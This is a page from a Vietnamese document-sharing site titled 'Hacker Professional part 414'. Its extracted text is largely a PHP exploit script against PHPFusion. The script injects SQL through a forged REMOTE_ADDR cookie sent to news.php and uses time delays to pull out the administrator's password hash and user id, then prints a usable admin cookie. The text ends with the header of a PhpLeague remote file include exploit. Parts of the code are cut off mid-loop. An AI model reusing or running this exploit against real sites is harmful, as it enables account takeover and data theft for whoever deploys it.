intTypePromotion=1
zunia.vn Tuyển sinh 2024 dành cho Gen-Z zunia.vn zunia.vn
ADSENSE

Hacker Professional part 414

Chia sẻ: Angel Smile | Ngày: | Loại File: PDF | Số trang:6

44
lượt xem
7
download
 
  Download Vui lòng tải xuống để xem tài liệu đầy đủ

Tham khảo tài liệu 'hacker professional part 414', công nghệ thông tin, kỹ thuật lập trình phục vụ nhu cầu học tập, nghiên cứu và làm việc hiệu quả

Chủ đề:
Lưu

Nội dung Text: Hacker Professional part 414

  1. print_r(' -------------------------------------------------------------------------------- Usage: php '.$argv[0].' host path OPTIONS host: target server (ip/hostname) path: path to PHPFusion Options: -T[prefix: specify a table prefix (default: fusion_) -p[port]: specify a port other than 80 -P[ip:port]: specify a proxy Examples: php '.$argv[0].' localhost /fusion/ php '.$argv[0].' localhost /fusion/ -p81 php '.$argv[0].' localhost / -P1.1.1.1:80 -------------------------------------------------------------------------------- '); die; } error_reporting(0); ini_set("max_execution_time",0); ini_set("default_socket_timeout",5); function quick_dump($string) { $result='';$exa='';$cont=0; for ($i=0; $i
  2. $proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; function sendpacketii($packet) { global $proxy, $host, $port, $html, $proxy_regex; if ($proxy=='') { $ock=fsockopen(gethostbyname($host),$port); if (!$ock) { echo 'No response from '.$host.':'.$port; die; } } else { $c = preg_match($proxy_regex,$proxy); if (!$c) { echo 'Not a valid proxy...';die; } $parts=explode(':',$proxy); echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n"; $ock=fsockopen($parts[0],$parts[1]); if (!$ock) { echo 'No response from proxy...';die; } } fputs($ock,$packet); if ($proxy=='') { $html=''; while (!feof($ock)) { $html.=fgets($ock); } } else { $html=''; while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { $html.=fread($ock,1); } } fclose($ock); #debug #echo "\r\n".$html;
  3. } $host=$argv[1]; $path=$argv[2]; $port=80; $proxy=""; $prefix="fusion_"; for ($i=3; $i
  4. echo "sql -> ".$sql."\n"; $sql=urlencode($sql); $packet="GET ".$p."news.php HTTP/1.0\r\n"; $packet.="Accept: text/plain\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Cookie: _SERVER[REMOTE_ADDR]=$sql;\r\n"; $packet.="Connection: Close\r\n\r\n"; usleep(2000000); $starttime=time(); sendpacketii($packet); $endtime=time(); echo "starttime -> ".$starttime."\n"; echo "endtime -> ".$endtime."\n"; $difftime=$endtime - $starttime; echo "difftime -> ".$difftime."\n"; if ($difftime > 10) {$password.=chr($i);echo "password -> ".$password."[???]\n";sleep(1);break;} } if ($i==255) {die("\nExploit failed...");} } $j++; } $chars[]=""; $chars[0]=0;//null $chars=array_merge($chars,range(48,57)); //numbers $j=1;$id=""; while (!strstr($id,chr(0))) { for ($i=0; $i
  5. $packet="GET ".$p."news.php HTTP/1.0\r\n"; $packet.="Accept: text/plain\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Cookie: _SERVER[REMOTE_ADDR]=$sql;\r\n"; $packet.="Connection: Close\r\n\r\n"; usleep(2000000); $starttime=time(); sendpacketii($packet); $endtime=time(); echo "starttime -> ".$starttime."\n"; echo "endtime -> ".$endtime."\n"; $difftime=$endtime - $starttime; echo "difftime -> ".$difftime."\n"; if ($difftime > 10) {$id.=chr($i);echo "id -> ".$id."[???]\n";sleep(1);break;} } if ($i==255) {die("\nExploit failed...");} } $j++; } echo "admin cookie -> fusion_user=".trim($id).$password.";\n"; ?> Black_hat_cr(HCE) PhpLeague 0.81 Remote File Include Exploit Exploit ".HTML" Code: PhpLeague 0.81 Remote File Include Exploit //'========================================================= ====================================== //'[Script Name: Php League
ADSENSE

CÓ THỂ BẠN MUỐN DOWNLOAD

 

Đồng bộ tài khoản
2=>2